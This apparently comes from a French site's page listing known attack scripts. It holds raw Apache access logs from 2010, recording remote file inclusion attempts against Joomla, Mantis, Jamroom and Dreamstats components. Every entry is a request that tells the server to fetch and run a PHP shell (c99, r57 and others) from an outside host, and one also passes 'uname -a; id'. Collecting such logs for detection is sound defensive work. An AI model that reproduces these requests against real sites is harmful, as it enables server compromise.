 |
 |
|
|
Liste des scripts connus et des dernières attaques :
89.18.189.170 - - [31/Aug/2010:00:58:24 +0200] "GET /butik/install.txt HTTP/1.1" 404 271 "-" "Toata dragostea mea pentru diavola"
89.18.189.170 - - [31/Aug/2010:00:58:30 +0200] "GET /catalog/install.txt HTTP/1.1" 404 273 "-" "Toata dragostea mea pentru diavola"
127.0.0.1 - - [01/Sep/2010:00:30:01 +0200] "GET /id.txt HTTP/1.1" 404 261 "-" "Zend_Http_Client"
41.237.7.237 - - [29/Aug/2010:22:29:43 +0200] "GET /dreamstats/index.php?rootpath=http://saldiri.org/c99.txt? HTTP/1.0" 200 2891 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ar; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
66.249.65.57 - - [29/Aug/2010:22:29:44 +0200] "GET /dreamstats/index.php?rootpath=http://saldiri.org/c99.txt? HTTP/1.1" 200 2890 "-" "Mediapartners-Google"
188.53.101.62 - - [31/Aug/2010:07:03:00 +0200] "GET /dreamstats/index.php?rootpath=http://saldiri.org/r57.txt? HTTP/1.1" 200 2753 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; SIMBAR={7FC75E96-DEA4-4358-9D3B-80E74663BC41}; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; AskTbUT2V5/5.8.0.12304)"
85.27.21.229 - - [01/Sep/2010:04:56:57 +0200] "GET /dreamstats/index.php?rootpath=http://islam.shomoo5.com/images/m.txt? HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.127 Safari/533.4"
66.249.65.48 - - [01/Sep/2010:04:56:58 +0200] "GET /dreamstats/index.php?rootpath=http://islam.shomoo5.com/images/m.txt? HTTP/1.1" 200 2752 "-" "Mediapartners-Google"
41.235.58.75 - - [01/Sep/2010:17:22:04 +0200] "GET /dreamstats/index.php?rootpath=http://www.c99shell.com/c99.txt HTTP/1.1" 200 2887 "-" "Mozilla/5.0 (Windows NT 6.1; rv:2.0b4) Gecko/20100818 Firefox/4.0b4"
66.249.65.3 - - [01/Sep/2010:17:22:06 +0200] "GET /dreamstats/index.php?rootpath=http://www.c99shell.com/c99.txt HTTP/1.1" 200 2888 "-" "Mediapartners-Google"
66.249.65.3 - - [01/Sep/2010:17:22:07 +0200] "GET /dreamstats/index.php?rootpath=http://www.c99shell.com/c99.txt HTTP/1.1" 200 2887 "-" "Mediapartners-Google"
188.50.51.16 - - [02/Sep/2010:08:31:13 +0200] "GET /PaTh/index.php?rootpath=http://h1.ripway.com/hak116/gaza.txt HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
188.50.51.16 - - [02/Sep/2010:08:31:17 +0200] "GET /PaTh/index.php?rootpath=http://h1.ripway.com/hak116/gaza.txt%BF HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
188.50.51.16 - - [02/Sep/2010:08:31:25 +0200] "GET /PaTh/index.php?rootpath=http://h1.ripway.com/hak116/gaza.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
41.105.86.154 - - [02/Sep/2010:08:50:11 +0200] "GET /rootpath=http://dover.micfo.com/~couples/public/linuxhak.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729) Facicons"
41.107.99.246 - - [02/Sep/2010:12:40:10 +0200] "GET /path/index.php?rootpath=http://alsayad.by.ru/shell/c99.txt? HTTP/1.1" 404 271 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)"
72.249.144.20 - - [29/Aug/2010:22:19:11 +0200] "GET /post/Bloquer-robot-navigateur-indes%20%E2%80%A6/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 8332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
72.249.144.20 - - [29/Aug/2010:22:19:11 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 8332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
72.249.144.20 - - [29/Aug/2010:22:19:11 +0200] "GET /post/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 8332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
72.249.144.20 - - [29/Aug/2010:22:24:20 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 8332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
72.249.144.20 - - [29/Aug/2010:22:24:21 +0200] "GET /post/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 8332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
72.249.144.20 - - [29/Aug/2010:22:24:21 +0200] "GET /post/Bloquer-robot-navigateur-indesirable%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 8332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
93.186.196.44 - - [30/Aug/2010:17:57:36 +0200] "GET /post/Bloquer-robot-navigateur-indesirable//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://markoffcarpaccio.com/forum/avatars/id2.txt%0D?? HTTP/1.1" 404 8334 "-" "libwww-perl/5.813"
93.186.196.44 - - [30/Aug/2010:17:57:36 +0200] "GET //components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://markoffcarpaccio.com/forum/avatars/id2.txt%0D?? HTTP/1.1" 404 8334 "-" "libwww-perl/5.813"
93.186.196.44 - - [30/Aug/2010:17:57:36 +0200] "GET /post//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://markoffcarpaccio.com/forum/avatars/id2.txt%0D?? HTTP/1.1" 404 8334 "-" "libwww-perl/5.813"
76.74.254.196 - - [30/Aug/2010:19:45:22 +0200] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt?? HTTP/1.1" 404 8334 "-" "libwww-perl/5.805"
76.74.254.196 - - [30/Aug/2010:20:32:55 +0200] "GET /post/Bloquer-robot-navigateur-indesirable//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt?? HTTP/1.1" 404 8334 "-" "libwww-perl/5.805"
76.74.254.196 - - [30/Aug/2010:20:32:56 +0200] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt?? HTTP/1.1" 404 8334 "-" "libwww-perl/5.805"
76.74.254.196 - - [30/Aug/2010:20:32:57 +0200] "GET /post//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt?? HTTP/1.1" 404 8334 "-" "libwww-perl/5.805"
188.53.101.62 - - [31/Aug/2010:06:59:02 +0200] "GET /post/Dreamstats/index.php?rootpath=http://saldiri.org/r57.txt? HTTP/1.1" 404 2235 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; SIMBAR={7FC75E96-DEA4-4358-9D3B-80E74663BC41}; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; AskTbUT2V5/5.8.0.12304)"
208.113.72.169 - - [31/Aug/2010:11:55:38 +0200] "GET /post/day.php?http://infantaterrible.com/hola/id.txt%0D?? HTTP/1.1" 404 8334 "-" "libwww-perl/5.805"
208.113.72.169 - - [31/Aug/2010:11:55:38 +0200] "GET /day.php?http://infantaterrible.com/hola/id.txt%0D?? HTTP/1.1" 404 8334 "-" "libwww-perl/5.805"
208.113.72.169 - - [31/Aug/2010:11:55:38 +0200] "GET /post/Installation-configuration-APACHE-2.2-PHP-5.3/day.php?http://infantaterrible.com/hola/id.txt%0D?? HTTP/1.1" 404 8334 "-" "libwww-perl/5.805"
79.1.76.73 - - [31/Aug/2010:18:49:03 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://127.0.0.1/id.txt? HTTP/1.1" 404 8334 "-" "Mozilla/5.0"
79.1.76.73 - - [31/Aug/2010:18:49:03 +0200] "GET /post/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://127.0.0.1/id.txt? HTTP/1.1" 404 8334 "-" "Mozilla/5.0"
79.1.76.73 - - [31/Aug/2010:18:49:04 +0200] "GET /post/Bloquer-robot-navigateur-indesirable%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://127.0.0.1/id.txt? HTTP/1.1" 404 8334 "-" "Mozilla/5.0"
202.150.221.114 - - [31/Aug/2010:23:56:55 +0200] "GET /mantis/login_page.php?g_meta_include_file=http://kamus1.fileave.com/id.txt? HTTP/1.1" 404 8334 "-" "libwww-perl/5.823"
202.150.221.114 - - [31/Aug/2010:23:59:46 +0200] "GET /post/w00tw00t.at.ISC.SANS.DFind:)/mantis/login_page.php?g_meta_include_file=http://kamus1.fileave.com/id.txt? HTTP/1.1" 404 8334 "-" "libwww-perl/5.823"
202.150.221.114 - - [31/Aug/2010:23:59:47 +0200] "GET /mantis/login_page.php?g_meta_include_file=http://kamus1.fileave.com/id.txt? HTTP/1.1" 404 8334 "-" "libwww-perl/5.823"
202.150.221.114 - - [31/Aug/2010:23:59:48 +0200] "GET /post/mantis/login_page.php?g_meta_include_file=http://kamus1.fileave.com/id.txt? HTTP/1.1" 404 8334 "-" "libwww-perl/5.823"
151.81.3.180 - - [01/Sep/2010:03:00:08 +0200] "GET /mantis/login_page.php?g_meta_include_file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 8334 "-" "Mozilla/5.0"
151.81.3.180 - - [01/Sep/2010:03:00:09 +0200] "GET /post/w00tw00t.at.ISC.SANS.DFind:)/mantis/login_page.php?g_meta_include_file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 8334 "-" "Mozilla/5.0"
151.81.3.180 - - [01/Sep/2010:03:00:09 +0200] "GET /post/mantis/login_page.php?g_meta_include_file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 8334 "-" "Mozilla/5.0"
151.81.3.180 - - [01/Sep/2010:03:02:52 +0200] "GET /post/w00tw00t.at.ISC.SANS.DFind:)%20%20/mantis/login_page.php?g_meta_include_file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 8334 "-" "Mozilla/5.0"
[Wed Sep 01 00:30:01 2010] [error] [client 127.0.0.1] File does not exist: /var/www/id.txt
222.124.156.242 - - [29/Aug/2010:09:04:57 +0200] "PUT /1.txt HTTP/1.1" 405 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CF5E3CC5-C200-4C5F-946E-7EFFEDB5521E})"
218.29.234.50 - - [29/Aug/2010:10:24:05 +0200] "GET /hack/php/liste.php/22/2699281/C394-1A.txt HTTP/1.1" 200 51103 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
190.144.53.138 - - [29/Aug/2010:10:24:17 +0200] "GET /hack/php/liste.php/22/2699281/C394-1A.txt HTTP/1.1" 200 186006 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.249.144.20 - - [29/Aug/2010:22:16:22 +0200] "GET /hack/php/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
72.249.144.20 - - [29/Aug/2010:22:16:22 +0200] "GET /hack/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
72.249.144.20 - - [29/Aug/2010:22:16:22 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
72.249.144.20 - - [29/Aug/2010:22:16:22 +0200] "GET /hack/php/liste.php/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 200 186006 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
187.21.16.113 - - [29/Aug/2010:22:40:29 +0200] "GET /joomla/index.php?option=http://saldiri.org/c99.txt??? HTTP/1.1" 302 366 "-" "-"
72.249.144.20 - - [29/Aug/2010:23:28:06 +0200] "GET /hack/php//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
72.249.144.20 - - [29/Aug/2010:23:28:06 +0200] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
72.249.144.20 - - [29/Aug/2010:23:28:06 +0200] "GET /hack//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tajima-inaka.net/shop/images/main.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
94.23.47.127 - - [30/Aug/2010:00:27:30 +0200] "GET /hack//index.php?option=com_ccnewsletter&controller=http://events.tqoa.net/events/language/fr-FR/Ckrid1.txt?? HTTP/1.1" 404 1467 "-" "MaMa CaSpEr"
94.23.47.127 - - [30/Aug/2010:00:27:30 +0200] "GET /hack/php//index.php?option=com_ccnewsletter&controller=http://events.tqoa.net/events/language/fr-FR/Ckrid1.txt?? HTTP/1.1" 200 5512 "-" "MaMa CaSpEr"
94.23.47.127 - - [30/Aug/2010:00:27:29 +0200] "GET //index.php?option=com_ccnewsletter&controller=http://events.tqoa.net/events/language/fr-FR/Ckrid1.txt?? HTTP/1.1" 200 13769 "-" "MaMa CaSpEr"
87.193.48.235 - - [30/Aug/2010:12:41:42 +0200] "GET //include/mail.inc.php?skin_board_path=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 302 388 "-" "Mozilla/5.0"
87.193.48.235 - - [30/Aug/2010:12:41:43 +0200] "GET /hack/php//include/mail.inc.php?skin_board_path=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 302 388 "-" "Mozilla/5.0"
87.193.48.235 - - [30/Aug/2010:12:41:45 +0200] "GET /hack//include/mail.inc.php?skin_board_path=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 302 388 "-" "Mozilla/5.0"
109.72.85.41 - - [30/Aug/2010:12:52:23 +0200] "GET //include/mail.inc.php?skin_board_path=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 302 388 "-" "Mozilla/5.0"
109.72.85.41 - - [30/Aug/2010:12:52:23 +0200] "GET /hack//include/mail.inc.php?skin_board_path=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 302 388 "-" "Mozilla/5.0"
109.72.85.41 - - [30/Aug/2010:12:52:23 +0200] "GET /hack/php//include/mail.inc.php?skin_board_path=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 302 388 "-" "Mozilla/5.0"
93.186.196.44 - - [30/Aug/2010:18:03:47 +0200] "GET //components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://markoffcarpaccio.com/forum/avatars/id2.txt%0D?? HTTP/1.1" 302 408 "-" "libwww-perl/5.813"
93.186.196.44 - - [30/Aug/2010:18:03:47 +0200] "GET /hack/php//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://markoffcarpaccio.com/forum/avatars/id2.txt%0D?? HTTP/1.1" 302 408 "-" "libwww-perl/5.813"
93.186.196.44 - - [30/Aug/2010:18:03:47 +0200] "GET /hack//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://markoffcarpaccio.com/forum/avatars/id2.txt%0D?? HTTP/1.1" 302 408 "-" "libwww-perl/5.813"
61.7.174.230 - - [31/Aug/2010:08:19:15 +0200] "GET /hack/php//include/bbs.lib.inc.php?site_path=http://infantaterrible.com/hola/id.txt%0D?? HTTP/1.1" 302 383 "-" "libwww-perl/5.79"
61.7.174.230 - - [31/Aug/2010:08:19:15 +0200] "GET //include/bbs.lib.inc.php?site_path=http://infantaterrible.com/hola/id.txt%0D?? HTTP/1.1" 302 383 "-" "libwww-perl/5.79"
85.214.84.36 - - [31/Aug/2010:12:48:01 +0200] "GET //include/mail.inc.php?skin_board_path=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 302 388 "-" "Mozilla/5.0"
85.214.84.36 - - [31/Aug/2010:12:48:01 +0200] "GET /hack//include/mail.inc.php?skin_board_path=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 302 388 "-" "Mozilla/5.0"
85.214.84.36 - - [31/Aug/2010:12:48:04 +0200] "GET /hack/php//include/mail.inc.php?skin_board_path=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 302 388 "-" "Mozilla/5.0"
193.200.150.82 - - [31/Aug/2010:13:14:42 +0200] "GET /hack/php/liste.php/22/2699281/C394-1A.txt HTTP/1.0" 200 107926 "-" "http://Anonymouse.org/ (Unix)"
79.1.76.73 - - [31/Aug/2010:18:43:33 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://127.0.0.1/id.txt? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
79.1.76.73 - - [31/Aug/2010:18:43:34 +0200] "GET /hack/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://127.0.0.1/id.txt? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
79.1.76.73 - - [31/Aug/2010:18:43:34 +0200] "GET /hack/php/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://127.0.0.1/id.txt? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
109.228.140.36 - - [31/Aug/2010:19:00:33 +0200] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://a-1handymanandremodelinc.com/images/wpThumbnails/s2/s.txt? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
109.228.140.36 - - [31/Aug/2010:19:00:33 +0200] "GET /hack//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://a-1handymanandremodelinc.com/images/wpThumbnails/s2/s.txt? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
109.228.140.36 - - [31/Aug/2010:19:00:34 +0200] "GET /hack/php//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://a-1handymanandremodelinc.com/images/wpThumbnails/s2/s.txt? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
109.228.140.36 - - [31/Aug/2010:19:01:40 +0200] "GET /hack//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://a-1handymanandremodelinc.com/images/wpThumbnails/s2/s.txt? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
109.228.140.36 - - [31/Aug/2010:19:01:40 +0200] "GET /hack/php//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://a-1handymanandremodelinc.com/images/wpThumbnails/s2/s.txt? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
109.228.140.36 - - [31/Aug/2010:19:01:40 +0200] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://a-1handymanandremodelinc.com/images/wpThumbnails/s2/s.txt? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
109.123.102.100 - - [31/Aug/2010:19:02:00 +0200] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://jimbaran.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 1467 "-" "MaMa CaSpEr"
109.123.102.100 - - [31/Aug/2010:19:02:00 +0200] "GET /hack/php//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://jimbaran.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 1467 "-" "MaMa CaSpEr"
109.123.102.100 - - [31/Aug/2010:19:02:00 +0200] "GET /hack//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://jimbaran.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 1467 "-" "MaMa CaSpEr"
202.150.221.114 - - [31/Aug/2010:23:55:46 +0200] "GET /hack/php/mantis/login_page.php?g_meta_include_file=http://kamus1.fileave.com/id.txt? HTTP/1.1" 302 379 "-" "libwww-perl/5.823"
202.150.221.114 - - [31/Aug/2010:23:55:47 +0200] "GET /mantis/login_page.php?g_meta_include_file=http://kamus1.fileave.com/id.txt? HTTP/1.1" 302 379 "-" "libwww-perl/5.823"
202.150.221.114 - - [31/Aug/2010:23:55:47 +0200] "GET /hack/mantis/login_page.php?g_meta_include_file=http://kamus1.fileave.com/id.txt? HTTP/1.1" 302 379 "-" "libwww-perl/5.823"
202.150.221.114 - - [01/Sep/2010:00:09:45 +0200] "GET /hack/php/mantis/login_page.php?g_meta_include_file=http://kamus1.fileave.com/id.txt? HTTP/1.1" 302 379 "-" "libwww-perl/5.823"
202.150.221.114 - - [01/Sep/2010:00:09:46 +0200] "GET /mantis/login_page.php?g_meta_include_file=http://kamus1.fileave.com/id.txt? HTTP/1.1" 302 379 "-" "libwww-perl/5.823"
202.150.221.114 - - [01/Sep/2010:00:09:46 +0200] "GET /hack/mantis/login_page.php?g_meta_include_file=http://kamus1.fileave.com/id.txt? HTTP/1.1" 302 379 "-" "libwww-perl/5.823"
109.93.173.22 - - [01/Sep/2010:01:17:06 +0200] "GET /hack/php/liste.php/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ma.vvind.com/uploads/php.txt?&cmd=uname%20-a;%20id HTTP/1.1" 200 124996 "-" "Mozilla/3.0 (compatible; Indy Library)"
151.81.3.180 - - [01/Sep/2010:03:12:46 +0200] "GET /mantis/login_page.php?g_meta_include_file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 302 402 "-" "Mozilla/5.0"
151.81.3.180 - - [01/Sep/2010:03:12:47 +0200] "GET /hack/php/mantis/login_page.php?g_meta_include_file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 302 402 "-" "Mozilla/5.0"
151.81.3.180 - - [01/Sep/2010:03:12:47 +0200] "GET /hack/mantis/login_page.php?g_meta_include_file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 302 402 "-" "Mozilla/5.0"
213.185.128.150 - - [01/Sep/2010:15:46:06 +0200] "GET /hack//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 397 "-" "libwww-perl/5.79"
213.185.128.150 - - [01/Sep/2010:15:46:06 +0200] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 397 "-" "libwww-perl/5.79"
213.185.128.150 - - [01/Sep/2010:15:46:06 +0200] "GET /hack/php//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 397 "-" "libwww-perl/5.79"
184.107.48.153 - - [01/Sep/2010:16:46:40 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yscan.vtrain2u.com/fx29id.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
184.107.48.153 - - [01/Sep/2010:16:46:43 +0200] "GET /hack/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yscan.vtrain2u.com/fx29id.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
184.107.48.153 - - [01/Sep/2010:16:46:43 +0200] "GET /hack/php/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yscan.vtrain2u.com/fx29id.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:17 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=shellz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:21 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=scannerz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:22 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:23 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:26 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:26 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=shellz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:28 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:29 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=scannerz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:29 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=scannerz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:31 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:31 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
